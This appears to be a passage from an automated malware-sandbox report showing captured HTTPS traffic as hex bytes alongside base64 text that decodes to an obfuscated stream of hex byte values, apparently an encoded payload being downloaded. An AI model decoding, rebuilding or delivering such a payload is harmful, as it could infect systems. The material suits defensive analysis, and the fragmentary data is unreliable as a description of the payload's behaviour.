                                                      Data Ascii: GLGBBNyxgQTcsYDM5LGAwMCxgRkMsYDcxLGA1RixgRkQsYDFCLGBGRixgNTAsYEZBLGBFMyxgQkYsYEQ5LGBFRixgRkUsYERGLGBGOSxgMDAsYDA2LGA5QyxgQUEsYDdGLGBCNSxgMDMsYEUwLGA2MyxgMDAsYEY4LGA5QixgRkUsYEQ0LGBCRixgRkYsYDNGLGA0OSxgNUYsYDNFLGBCRixgRjMsYEM0LGAwNyxgMTAsYEYzLGAxMCxgRkUsYE
                                                      2021-12-02 17:26:37 UTC480INData Raw: 44 4c 47 41 33 4e 79 78 67 51 7a 41 73 59 45 5a 46 4c 47 41 33 4d 69 78 67 52 54 51 73 59 45 56 47 4c 47 42 46 51 69 78 67 4d 30 59 73 59 45 59 78 4c 47 42 44 4e 79 78 67 51 6b 59 73 59 44 6b 31 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 45 49 33 4c 47 42 46 52 69 78 67 4e 30 45 73 59 45 51 78 4c 47 42 44 51 53 78 67 52 55 59 73 59 45 5a 45 4c 47 41 31 51 69 78 67 4e 55 55 73 59 45 5a 47 4c 47 41 30 51 69 78 67 4f 45 59 73 59 44 41 77 4c 47 42 45 4e 69 78 67 4e 45 49 73 59 45 59 30 4c 47 42 42 4e 69 78 67 52 6b 59 73 59 45 55 35 4c 47 42 43 4e 79 78 67 4e 30 59 73 59 44 4a 45 4c 47 41 77 52 69 78 67 52 55 4d 73 59 45 4a 47 4c 47 42 43 4d 53 78 67 4d 7a 55 73 59 44 45 78 4c 47 42 43 4d 43 78 67 52 44 63 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 45
                                                      Data Ascii: DLGA3NyxgQzAsYEZFLGA3MixgRTQsYEVGLGBFQixgM0YsYEYxLGBDNyxgQkYsYDk1LGAzRSxgRkMsYEI3LGBFRixgN0EsYEQxLGBDQSxgRUYsYEZELGA1QixgNUUsYEZGLGA0QixgOEYsYDAwLGBENixgNEIsYEY0LGBBNixgRkYsYEU5LGBCNyxgN0YsYDJELGAwRixgRUMsYEJGLGBCMSxgMzUsYDExLGBCMCxgRDcsYDNGLGA1NSxgRkYsYE
                                                      2021-12-02 17:26:37 UTC496INData Raw: 77 4c 47 41 78 52 69 78 67 52 6b 4d 73 59 44 55 30 4c 47 41 33 52 43 78 67 52 44 59 73 59 44 41 78 4c 47 42 47 51 69 78 67 4d 54 63 73 59 44 41 77 4c 47 42 46 51 79 78 67 51 6b 49 73 59 45 46 45 4c 47 41 7a 52 69 78 67 52 6b 59 73 59 44 5a 47 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 46 44 4c 47 41 33 4e 79 78 67 52 6b 59 73 59 45 52 44 4c 47 42 43 52 69 78 67 52 54 45 73 59 44 67 7a 4c 47 42 47 52 43 78 67 51 7a 6b 73 59 45 59 30 4c 47 42 43 4d 79 78 67 4e 55 59 73 59 45 5a 46 4c 47 42 43 52 69 78 67 52 6b 51 73 59 45 52 47 4c 47 42 43 52 69 78 67 52 54 55 73 59 44 4a 47 4c 47 42 42 4d 43 78 67 52 6a 63 73 59 44 64 46 4c 47 41 35 4d 69 78 67 4e 45 4d 73 59 44 52 43 4c 47 42 46 4e 79 78 67 51 6b 51 73 59 44 63 7a 4c 47 42 43 51 79 78 67 52 6a 63 73 59 45
                                                      Data Ascii: wLGAxRixgRkMsYDU0LGA3RCxgRDYsYDAxLGBGQixgMTcsYDAwLGBFQyxgQkIsYEFELGAzRixgRkYsYDZGLGA0RixgRkYsYEFDLGA3NyxgRkYsYERDLGBCRixgRTEsYDgzLGBGRCxgQzksYEY0LGBCMyxgNUYsYEZFLGBCRixgRkQsYERGLGBCRixgRTUsYDJGLGBBMCxgRjcsYDdFLGA5MixgNEMsYDRCLGBFNyxgQkQsYDczLGBCQyxgRjcsYE
                                                      2021-12-02 17:26:37 UTC512INData Raw: 32 4c 47 41 77 4d 43 78 67 52 6b 49 73 59 45 51 7a 4c 47 41 32 4e 79 78 67 51 7a 63 73 59 44 64 47 4c 47 41 30 4f 43 78 67 51 6b 45 73 59 45 5a 47 4c 47 41 79 51 69 78 67 52 6a 63 73 59 44 64 46 4c 47 41 77 4e 79 78 67 4d 55 59 73 59 45 56 44 4c 47 42 46 52 69 78 67 52 6a 45 73 59 44 4a 47 4c 47 41 35 52 43 78 67 4d 44 4d 73 59 45 56 44 4c 47 42 42 52 69 78 67 52 54 63 73 59 44 68 45 4c 47 42 47 4d 69 78 67 4d 55 59 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 44 49 73 59 44 4d 78 4c 47 42 45 4e 79 78 67 4e 54 45 73 59 45 51 79 4c 47 42 46 51 53 78 67 52 44 41 73 59 44 4e 47 4c 47 42 45 51 69 78 67 4d 44 45 73 59 45 5a 43 4c 47 42 47 4e 79 78 67 52 6b 51 73 59 44 4d 79 4c 47 41 77 4d 69 78 67 52 6b 49 73 59 44 41 33 4c 47 41 31 51 79 78 67 52 6b 59 73 59 45
                                                      Data Ascii: 2LGAwMCxgRkIsYEQzLGA2NyxgQzcsYDdGLGA0OCxgQkEsYEZGLGAyQixgRjcsYDdFLGAwNyxgMUYsYEVDLGBFRixgRjEsYDJGLGA5RCxgMDMsYEVDLGBBRixgRTcsYDhELGBGMixgMUYsYEY5LGA4QixgNDIsYDMxLGBENyxgNTEsYEQyLGBFQSxgRDAsYDNGLGBEQixgMDEsYEZCLGBGNyxgRkQsYDMyLGAwMixgRkIsYDA3LGA1QyxgRkYsYE
                                                      2021-12-02 17:26:37 UTC528INData Raw: 47 4c 47 41 7a 4f 53 78 67 4d 7a 51 73 59 44 51 35 4c 47 41 30 51 53 78 67 51 6b 49 73 59 44 4e 47 4c 47 41 34 4f 43 78 67 4d 44 51 73 59 45 46 43 4c 47 41 77 4d 79 78 67 52 6a 55 73 59 44 49 7a 4c 47 41 30 4d 43 78 67 52 6b 51 73 59 45 59 31 4c 47 41 33 52 53 78 67 52 6a 6b 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 54 63 73 59 45 45 33 4c 47 42 42 4e 79 78 67 4e 30 59 73 59 45 5a 45 4c 47 42 42 52 69 78 67 52 6a 6b 73 59 45 56 47 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4f 54 63 73 59 45 5a 46 4c 47 41 32 4d 69 78 67 4d 6a 41 73 59 45 5a 43 4c 47 42 43 4d 53 78 67 4d 7a 63 73 59 44 49 31 4c 47 41 33 52 69 78 67 52 6a 45 73 59 44 4e 47 4c 47 41 78 4f 43 78 67 52 54 59 73 59 45 4d 7a 4c 47 41 31 4e 43 78 67 4d 30 51 73 59 44
                                                      Data Ascii: GLGAzOSxgMzQsYDQ5LGA0QSxgQkIsYDNGLGA4OCxgMDQsYEFCLGAwMyxgRjUsYDIzLGA0MCxgRkQsYEY1LGA3RSxgRjksYDVGLGBGQyxgOTcsYEE3LGBBNyxgN0YsYEZELGBBRixgRjksYEVGLGBGOCxgNTAsYDNGLGBGRCxgOTcsYEZFLGA2MixgMjAsYEZCLGBCMSxgMzcsYDI1LGA3RixgRjEsYDNGLGAxOCxgRTYsYEMzLGA1NCxgM0QsYD
                                                      2021-12-02 17:26:37 UTC544INData Raw: 45 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 52 46 4c 47 42 46 4d 69 78 67 51 6a 55 73 59 45 52 47 4c 47 42 46 4e 79 78 67 52 6a 63 73 59 44 4d 34 4c 47 42 47 52 43 78 67 4d 6a 4d 73 59 45 51 7a 4c 47 42 45 52 69 78 67 52 54 49 73 59 44 63 33 4c 47 41 30 4f 43 78 67 4d 44 4d 73 59 44 51 32 4c 47 42 47 52 69 78 67 4e 30 51 73 59 45 5a 47 4c 47 42 42 4e 53 78 67 51 6b 59 73 59 44 45 33 4c 47 42 45 4f 43 78 67 52 6a 67 73 59 45 46 43 4c 47 41 7a 52 53 78 67 51 6b 59 73 59 45 4d 33 4c 47 41 33 52 69 78 67 4d 54 55 73 59 45 46 42 4c 47 41 35 52 43 78 67 4e 7a 4d 73 59 45 4d 78 4c 47 41 34 4e 69 78 67 4e 54 59 73 59 44 64 45 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 42 46 4c 47 42 45 4f 43 78 67 52 45 59 73 59 44 42 42 4c 47 41 32 4d 43 78 67 51 30 49 73 59 45
                                                      Data Ascii: ELGA5RCxgRDcsYERFLGBFMixgQjUsYERGLGBFNyxgRjcsYDM4LGBGRCxgMjMsYEQzLGBERixgRTIsYDc3LGA0OCxgMDMsYDQ2LGBGRixgN0QsYEZGLGBBNSxgQkYsYDE3LGBEOCxgRjgsYEFCLGAzRSxgQkYsYEM3LGA3RixgMTUsYEFBLGA5RCxgNzMsYEMxLGA4NixgNTYsYDdELGBGRSxgRjEsYDBFLGBEOCxgREYsYDBBLGA2MCxgQ0IsYE
                                                      2021-12-02 17:26:37 UTC560INData Raw: 43 4c 47 42 47 52 53 78 67 4e 54 51 73 59 44 6b 32 4c 47 42 47 52 53 78 67 4d 55 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 44 59 73 59 44 64 47 4c 47 42 44 4d 43 78 67 52 55 59 73 59 44 4e 45 4c 47 42 44 51 79 78 67 4d 7a 59 73 59 44 64 47 4c 47 42 44 4e 43 78 67 51 55 59 73 59 44 49 78 4c 47 41 77 51 69 78 67 4e 7a 59 73 59 44 64 47 4c 47 41 78 4e 69 78 67 52 6a 55 73 59 45 5a 42 4c 47 42 43 4e 79 78 67 4d 6b 49 73 59 44 46 43 4c 47 41 78 52 43 78 67 52 6b 4d 73 59 44 52 45 4c 47 41 32 4d 43 78 67 4f 55 49 73 59 45 59 78 4c 47 41 7a 52 69 78 67 52 6a 63 73 59 44 51 33 4c 47 42 47 52 53 78 67 4d 45 55 73 59 45 55 35 4c 47 41 78 52 69 78 67 52 6b 4d 73 59 44 56 43 4c 47 42 47 52 69 78 67 4d 54 63 73 59 44 64 46 4c 47 41 31 4d 69 78 67 4e 44 55 73 59 45
                                                      Data Ascii: CLGBGRSxgNTQsYDk2LGBGRSxgMUQsYDVGLGBGQyxgODYsYDdGLGBDMCxgRUYsYDNELGBDQyxgMzYsYDdGLGBDNCxgQUYsYDIxLGAwQixgNzYsYDdGLGAxNixgRjUsYEZBLGBCNyxgMkIsYDFCLGAxRCxgRkMsYDRELGA2MCxgOUIsYEYxLGAzRixgRjcsYDQ3LGBGRSxgMEUsYEU5LGAxRixgRkMsYDVCLGBGRixgMTcsYDdFLGA1MixgNDUsYE
                                                      2021-12-02 17:26:37 UTC576INData Raw: 77 4c 47 42 47 51 69 78 67 52 6b 59 73 59 44 64 45 4c 47 41 7a 52 69 78 67 4e 44 55 73 59 44 6c 46 4c 47 42 44 4e 79 78 67 4e 30 59 73 59 45 59 32 4c 47 41 33 52 43 78 67 4d 55 45 73 59 45 56 42 4c 47 42 43 52 69 78 67 52 6a 59 73 59 44 52 47 4c 47 42 47 51 79 78 67 52 6a 55 73 59 45 5a 47 4c 47 41 79 52 43 78 67 4e 45 59 73 59 44 59 77 4c 47 42 47 51 53 78 67 4e 55 49 73 59 44 64 47 4c 47 41 33 4d 53 78 67 52 6a 63 73 59 44 63 33 4c 47 41 79 4d 43 78 67 4d 30 59 73 59 45 59 34 4c 47 41 35 4e 79 78 67 52 6b 4d 73 59 45 5a 43 4c 47 41 34 4e 69 78 67 4d 44 4d 73 59 44 4e 47 4c 47 42 46 52 53 78 67 51 7a 41 73 59 45 5a 47 4c 47 42 47 51 69 78 67 4e 54 6b 73 59 45 51 78 4c 47 41 34 4d 43 78 67 51 54 63 73 59 44 6b 79 4c 47 41 31 52 69 78 67 52 44 4d 73 59 45
                                                      Data Ascii: wLGBGQixgRkYsYDdELGAzRixgNDUsYDlFLGBDNyxgN0YsYEY2LGA3RCxgMUEsYEVBLGBCRixgRjYsYDRGLGBGQyxgRjUsYEZGLGAyRCxgNEYsYDYwLGBGQSxgNUIsYDdGLGA3MSxgRjcsYDc3LGAyMCxgM0YsYEY4LGA5NyxgRkMsYEZCLGA4NixgMDMsYDNGLGBFRSxgQzAsYEZGLGBGQixgNTksYEQxLGA4MCxgQTcsYDkyLGA1RixgRDMsYE
                                                      2021-12-02 17:26:37 UTC592INData Raw: 43 4c 47 42 47 52 43 78 67 4e 45 55 73 59 45 5a 47 4c 47 42 44 4e 79 78 67 52 55 59 73 59 44 6b 7a 4c 47 42 47 52 53 78 67 51 30 51 73 59 45 55 31 4c 47 42 45 52 43 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 44 52 69 78 67 4e 45 59 73 59 45 52 46 4c 47 42 47 52 43 78 67 4e 55 55 73 59 44 4d 30 4c 47 42 45 4e 43 78 67 52 45 59 73 59 45 5a 43 4c 47 42 42 4e 79 78 67 4e 6a 67 73 59 45 49 79 4c 47 41 33 52 53 78 67 51 6b 59 73 59 44 4e 47 4c 47 42 46 4d 43 78 67 4e 55 59 73 59 45 59 35 4c 47 42 42 4f 53 78 67 52 6a 51 73 59 44 41 33 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4e 43 78 67 52 6a 6b 73 59 44 68 43 4c 47 42 43 52 69 78 67 52 54 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4d 6a 55 73 59 44 64 47 4c 47 41 33 52 43 78 67 52 6b 45 73 59 44
                                                      Data Ascii: CLGBGRCxgNEUsYEZGLGBDNyxgRUYsYDkzLGBGRSxgQ0QsYEU1LGBERCxgRjMsYEY0LGBDRixgNEYsYERFLGBGRCxgNUUsYDM0LGBENCxgREYsYEZCLGBBNyxgNjgsYEIyLGA3RSxgQkYsYDNGLGBFMCxgNUYsYEY5LGBBOSxgRjQsYDA3LGBGRixgREEsYEJGLGA0NCxgRjksYDhCLGBCRixgRTQsYDZGLGBGRSxgMjUsYDdGLGA3RCxgRkEsYD
                                                      2021-12-02 17:26:37 UTC608INData Raw: 78 4c 47 41 79 4f 43 78 67 4f 54 55 73 59 45 5a 47 4c 47 42 45 4e 69 78 67 4e 6b 59 73 59 45 4a 46 4c 47 42 47 4d 79 78 67 52 44 63 73 59 45 45 33 4c 47 42 45 52 69 78 67 52 6b 55 73 59 44 45 7a 4c 47 42 43 52 69 78 67 4d 55 51 73 59 44 5a 42 4c 47 42 44 4e 43 78 67 4e 55 59 73 59 45 4a 47 4c 47 41 79 4d 79 78 67 4f 54 55 73 59 44 4e 43 4c 47 42 47 52 69 78 67 51 54 51 73 59 45 4e 47 4c 47 42 42 4d 53 78 67 4d 6b 55 73 59 44 67 79 4c 47 42 47 51 53 78 67 51 6a 55 73 59 44 64 47 4c 47 42 46 52 43 78 67 4f 54 41 73 59 45 4a 42 4c 47 41 33 52 69 78 67 51 55 59 73 59 44 6b 33 4c 47 41 34 4d 79 78 67 52 6b 55 73 59 44 59 33 4c 47 41 77 51 79 78 67 4e 55 59 73 59 45 5a 44 4c 47 42 45 4f 43 78 67 4e 55 59 73 59 44 42 43 4c 47 41 35 52 43 78 67 52 6a 67 73 59 44
                                                      Data Ascii: xLGAyOCxgOTUsYEZGLGBENixgNkYsYEJFLGBGMyxgRDcsYEE3LGBERixgRkUsYDEzLGBCRixgMUQsYDZBLGBDNCxgNUYsYEJGLGAyMyxgOTUsYDNCLGBGRixgQTQsYENGLGBBMSxgMkUsYDgyLGBGQSxgQjUsYDdGLGBFRCxgOTAsYEJBLGA3RixgQUYsYDk3LGA4MyxgRkUsYDY3LGAwQyxgNUYsYEZDLGBEOCxgNUYsYDBCLGA5RCxgRjgsYD
                                                      2021-12-02 17:26:37 UTC624INData Raw: 43 4c 47 42 42 4e 43 78 67 4d 30 59 73 59 45 59 35 4c 47 42 46 51 69 78 67 52 44 59 73 59 45 4a 47 4c 47 42 45 51 69 78 67 52 6a 6b 73 59 44 52 47 4c 47 41 32 52 43 78 67 51 7a 67 73 59 45 45 79 4c 47 41 78 51 69 78 67 4e 45 45 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 4e 44 49 73 59 45 55 35 4c 47 41 33 52 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4e 47 4c 47 41 30 51 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 34 51 69 78 67 4e 55 59 73 59 44 67 32 4c 47 41 32 51 69 78 67 4d 44 45 73 59 45 4a 47 4c 47 41 30 51 69 78 67 4e 44 63 73 59 44 45 30 4c 47 42 47 52 53 78 67 51 54 59 73 59 44 4a 47 4c 47 41 30 4d 79 78 67 4e 7a 63 73 59 44 4e 46 4c 47 41 31 4e 79 78 67 4e 54 51 73 59 45 5a 47 4c 47 42 46 4e 43 78 67 4d 45 55 73 59 45
                                                      Data Ascii: CLGBBNCxgM0YsYEY5LGBFQixgRDYsYEJGLGBEQixgRjksYDRGLGA2RCxgQzgsYEEyLGAxQixgNEEsYEZGLGA4MyxgNDIsYEU5LGA3RixgRkYsYEIzLGAzRixgRUQsYENGLGA0QixgMUYsYEZELGA4QixgNUYsYDg2LGA2QixgMDEsYEJGLGA0QixgNDcsYDE0LGBGRSxgQTYsYDJGLGA0MyxgNzcsYDNFLGA1NyxgNTQsYEZGLGBFNCxgMEUsYE
                                                      2021-12-02 17:26:37 UTC640INData Raw: 34 4c 47 42 46 4e 43 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 42 4e 79 78 67 4e 30 59 73 59 45 4a 47 4c 47 41 33 52 69 78 67 52 6a 49 73 59 44 42 43 4c 47 42 46 4f 53 78 67 52 45 59 73 59 45 59 32 4c 47 42 45 4e 79 78 67 4e 7a 67 73 59 44 52 44 4c 47 42 47 52 69 78 67 52 6b 55 73 59 45 4e 45 4c 47 42 42 4e 79 78 67 51 30 59 73 59 45 55 35 4c 47 42 45 52 69 78 67 51 6b 59 73 59 45 5a 43 4c 47 42 46 4f 53 78 67 52 55 59 73 59 44 52 43 4c 47 42 47 52 69 78 67 52 6b 55 73 59 45 4e 44 4c 47 42 45 4d 79 78 67 4f 54 49 73 59 45 5a 46 4c 47 41 33 52 43 78 67 4e 30 55 73 59 45 5a 42 4c 47 41 77 4e 79 78 67 52 44 4d 73 59 45 4a 47 4c 47 42 47 52 69 78 67 51 30 51 73 59 45 5a 45 4c 47 41 7a 52 69 78 67 4f 54 6b 73 59 45 5a 46 4c 47 42 47 52 43 78 67 4d 6b 59 73 59 44
                                                      Data Ascii: 4LGBFNCxgRjQsYDM3LGBBNyxgN0YsYEJGLGA3RixgRjIsYDBCLGBFOSxgREYsYEY2LGBENyxgNzgsYDRDLGBGRixgRkUsYENELGBBNyxgQ0YsYEU5LGBERixgQkYsYEZCLGBFOSxgRUYsYDRCLGBGRixgRkUsYENDLGBEMyxgOTIsYEZFLGA3RCxgN0UsYEZBLGAwNyxgRDMsYEJGLGBGRixgQ0QsYEZELGAzRixgOTksYEZFLGBGRCxgMkYsYD
                                                      2021-12-02 17:26:37 UTC656INData Raw: 44 4c 47 42 47 4f 43 78 67 4e 6b 49 73 59 44 4e 44 4c 47 41 33 51 69 78 67 52 6a 41 73 59 45 4e 47 4c 47 42 47 4d 79 78 67 4d 6a 63 73 59 45 5a 47 4c 47 41 79 51 53 78 67 51 6b 51 73 59 45 5a 43 4c 47 42 46 4e 79 78 67 4d 30 51 73 59 45 59 34 4c 47 41 33 4e 79 78 67 4d 30 55 73 59 45 5a 42 4c 47 41 34 52 69 78 67 4e 30 59 73 59 45 4e 45 4c 47 41 33 52 69 78 67 4f 55 4d 73 59 44 4e 47 4c 47 42 47 52 69 78 67 4d 55 51 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4f 54 63 73 59 44 64 46 4c 47 42 47 4d 79 78 67 4e 30 59 73 59 45 5a 43 4c 47 42 45 4e 79 78 67 52 6b 4d 73 59 45 56 47 4c 47 41 77 52 69 78 67 52 6b 55 73 59 45 51 7a 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 45 4d 33 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 64 47 4c 47 42 46 4e 53 78 67 4d 54 45 73 59 44
                                                      Data Ascii: DLGBGOCxgNkIsYDNDLGA3QixgRjAsYENGLGBGMyxgMjcsYEZGLGAyQSxgQkQsYEZCLGBFNyxgM0QsYEY4LGA3NyxgM0UsYEZBLGA4RixgN0YsYENELGA3RixgOUMsYDNGLGBGRixgMUQsYDNGLGBGRCxgOTcsYDdFLGBGMyxgN0YsYEZCLGBENyxgRkMsYEVGLGAwRixgRkUsYEQzLGBERixgRkMsYEM3LGA3RSxgOEQsYDdGLGBFNSxgMTEsYD
                                                      2021-12-02 17:26:37 UTC672INData Raw: 46 4c 47 41 77 52 53 78 67 52 6a 51 73 59 45 59 35 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 6b 33 4c 47 42 47 51 79 78 67 51 54 4d 73 59 44 64 47 4c 47 42 46 52 69 78 67 4d 30 59 73 59 44 52 42 4c 47 41 31 4d 79 78 67 52 6a 67 73 59 45 59 32 4c 47 41 78 52 69 78 67 52 6b 51 73 59 45 51 7a 4c 47 41 33 52 69 78 67 51 6a 4d 73 59 45 52 47 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 4d 31 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 45 5a 44 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 77 4f 43 78 67 51 7a 4d 73 59 44 4e 47 4c 47 42 46 4e 53 78 67 4e 30 45 73 59 45 5a 43 4c 47 41 78 52 69 78 67 52 6a 6b 73 59 44 56 43 4c 47 42 46 4f 43 78 67 52 54 63 73 59 45 52 47 4c 47 42 47 4f 43 78 67 4f 45 59 73 59 45 5a 46 4c 47 42 43 4d 53 78 67 52 44 4d 73 59 44
                                                      Data Ascii: FLGAwRSxgRjQsYEY5LGAzRixgRkEsYDk3LGBGQyxgQTMsYDdGLGBFRixgM0YsYDRBLGA1MyxgRjgsYEY2LGAxRixgRkQsYEQzLGA3RixgQjMsYERGLGAzMCxgRkQsYDM1LGA3RSxgRkMsYEZDLGAzNyxgRkUsYDNELGAwOCxgQzMsYDNGLGBFNSxgN0EsYEZCLGAxRixgRjksYDVCLGBFOCxgRTcsYERGLGBGOCxgOEYsYEZFLGBCMSxgRDMsYD
                                                      2021-12-02 17:26:37 UTC688INData Raw: 79 4c 47 42 42 4f 43 78 67 4e 30 4d 73 59 44 51 79 4c 47 41 77 4f 53 78 67 51 7a 63 73 59 45 5a 45 4c 47 41 7a 52 43 78 67 4e 44 41 73 59 44 4d 35 4c 47 42 45 4f 43 78 67 4e 7a 6b 73 59 44 64 42 4c 47 41 33 51 53 78 67 4f 45 59 73 59 44 51 7a 4c 47 41 34 51 69 78 67 52 6b 51 73 59 44 67 33 4c 47 42 47 4e 79 78 67 52 55 55 73 59 44 4e 45 4c 47 42 43 52 43 78 67 51 30 51 73 59 44 46 44 4c 47 41 78 52 43 78 67 4d 55 59 73 59 44 4e 44 4c 47 41 79 4d 79 78 67 51 55 51 73 59 45 4a 42 4c 47 41 77 51 69 78 67 4d 6b 49 73 59 45 5a 46 4c 47 41 32 51 79 78 67 4f 54 63 73 59 45 4d 79 4c 47 41 31 51 79 78 67 4e 44 41 73 59 44 63 35 4c 47 42 47 4f 43 78 67 52 54 51 73 59 45 51 35 4c 47 41 77 4d 53 78 67 51 7a 55 73 59 44 6b 78 4c 47 42 44 4e 43 78 67 52 44 63 73 59 44
                                                      Data Ascii: yLGBBOCxgN0MsYDQyLGAwOSxgQzcsYEZELGAzRCxgNDAsYDM5LGBEOCxgNzksYDdBLGA3QSxgOEYsYDQzLGA4QixgRkQsYDg3LGBGNyxgRUUsYDNELGBCRCxgQ0QsYDFDLGAxRCxgMUYsYDNDLGAyMyxgQUQsYEJBLGAwQixgMkIsYEZFLGA2QyxgOTcsYEMyLGA1QyxgNDAsYDc5LGBGOCxgRTQsYEQ5LGAwMSxgQzUsYDkxLGBDNCxgRDcsYD
                                                      2021-12-02 17:26:37 UTC704INData Raw: 47 4c 47 42 43 52 69 78 67 52 6a 4d 73 59 44 68 47 4c 47 42 47 51 79 78 67 4f 54 45 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 59 33 4c 47 41 34 52 69 78 67 52 6b 4d 73 59 44 6b 35 4c 47 42 43 52 69 78 67 52 6b 59 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4d 7a 51 73 59 44 5a 43 4c 47 42 43 4d 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 4d 34 4c 47 41 78 52 69 78 67 51 6a 51 73 59 45 59 33 4c 47 41 34 52 69 78 67 52 6b 55 73 59 44 41 35 4c 47 42 45 4f 53 78 67 51 55 59 73 59 44 63 78 4c 47 42 47 4e 69 78 67 4f 45 59 73 59 45 5a 44 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 45 4d 34 4c 47 41 31 52 69 78 67 52 6b 4d 73 59 44 68 47 4c 47 42 47 52 53 78 67 52 6a 6b 73 59 45 51 35 4c 47 42 42 52 69 78 67 4e 44 45 73 59 44
                                                      Data Ascii: GLGBCRixgRjMsYDhGLGBGQyxgOTEsYEZGLGBFOCxgNUYsYEY3LGA4RixgRkMsYDk5LGBCRixgRkYsYEFGLGBGMSxgMzQsYDZCLGBCMyxgNUYsYEUzLGAwNyxgRkYsYEM4LGAxRixgQjQsYEY3LGA4RixgRkUsYDA5LGBEOSxgQUYsYDcxLGBGNixgOEYsYEZDLGA1OSxgRkYsYEM4LGA1RixgRkMsYDhGLGBGRSxgRjksYEQ5LGBBRixgNDEsYD
                                                      2021-12-02 17:26:37 UTC720INData Raw: 47 4c 47 42 47 52 43 78 67 52 45 49 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 45 59 73 59 45 59 79 4c 47 41 78 4e 79 78 67 52 6b 4d 73 59 44 49 7a 4c 47 41 33 52 69 78 67 52 45 59 73 59 44 4e 47 4c 47 42 47 51 53 78 67 4d 7a 63 73 59 45 5a 46 4c 47 41 79 4d 79 78 67 4e 30 59 73 59 45 5a 43 4c 47 42 42 52 69 78 67 52 6a 45 73 59 44 68 47 4c 47 42 47 52 53 78 67 4d 6a 6b 73 59 44 4a 47 4c 47 42 47 4e 69 78 67 51 7a 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 52 45 59 73 59 45 5a 46 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 45 5a 46 4c 47 42 43 52 69 78 67 51 7a 6b 73 59 44 4e 47 4c 47 42 47 51 53 78 67 4d 54 63 73 59 44 64 44 4c 47 41 30 51 53 78 67 4d 30 59 73 59 45 56 47 4c 47 41 33 52 43 78 67 4f 54 45 73 59 45 5a 45 4c 47 42 42 4d 79 78 67 4e 30 59 73 59 44
                                                      Data Ascii: GLGBGRCxgREIsYDdFLGA4RCxgREYsYEYyLGAxNyxgRkMsYDIzLGA3RixgREYsYDNGLGBGQSxgMzcsYEZFLGAyMyxgN0YsYEZCLGBBRixgRjEsYDhGLGBGRSxgMjksYDJGLGBGNixgQzYsYEZGLGBFOCxgREYsYEZFLGA2QixgRkMsYEZFLGBCRixgQzksYDNGLGBGQSxgMTcsYDdDLGA0QSxgM0YsYEVGLGA3RCxgOTEsYEZELGBBMyxgN0YsYD
                                                      2021-12-02 17:26:37 UTC736INData Raw: 77 4c 47 41 30 4f 43 78 67 4f 54 49 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 4e 55 49 73 59 44 6b 35 4c 47 41 31 4d 79 78 67 4e 6a 4d 73 59 44 59 31 4c 47 41 7a 4d 43 78 67 4e 6a 63 73 59 44 45 79 4c 47 42 43 4d 53 78 67 4e 44 67 73 59 44 63 30 4c 47 41 34 4d 69 78 67 52 6a 63 73 59 44 41 31 4c 47 41 31 4e 79 78 67 4f 54 45 73 59 44 68 44 4c 47 41 77 4e 79 78 67 4d 45 4d 73 59 44 59 31 4c 47 41 34 52 69 78 67 4e 7a 45 73 59 44 4d 7a 4c 47 42 47 4d 69 78 67 4d 6a 6b 73 59 44 63 79 4c 47 41 79 4e 53 78 67 52 45 4d 73 59 44 59 34 4c 47 42 46 51 79 78 67 4f 54 51 73 59 45 4e 44 4c 47 42 42 51 53 78 67 4e 6a 67 73 59 44 4d 31 4c 47 42 43 4d 53 78 67 52 6a 49 73 59 44 51 32 4c 47 41 33 51 69 78 67 4f 44 67 73 59 44 49 32 4c 47 41 78 4e 43 78 67 52 44 6b 73 59 44
                                                      Data Ascii: wLGA0OCxgOTIsYEZGLGA0NCxgNUIsYDk5LGA1MyxgNjMsYDY1LGAzMCxgNjcsYDEyLGBCMSxgNDgsYDc0LGA4MixgRjcsYDA1LGA1NyxgOTEsYDhDLGAwNyxgMEMsYDY1LGA4RixgNzEsYDMzLGBGMixgMjksYDcyLGAyNSxgREMsYDY4LGBFQyxgOTQsYENDLGBBQSxgNjgsYDM1LGBCMSxgRjIsYDQ2LGA3QixgODgsYDI2LGAxNCxgRDksYD
